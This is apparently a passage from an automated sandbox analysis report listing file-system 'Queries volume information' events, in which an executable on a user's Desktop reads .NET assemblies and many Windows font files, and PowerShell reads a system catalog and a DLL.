                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
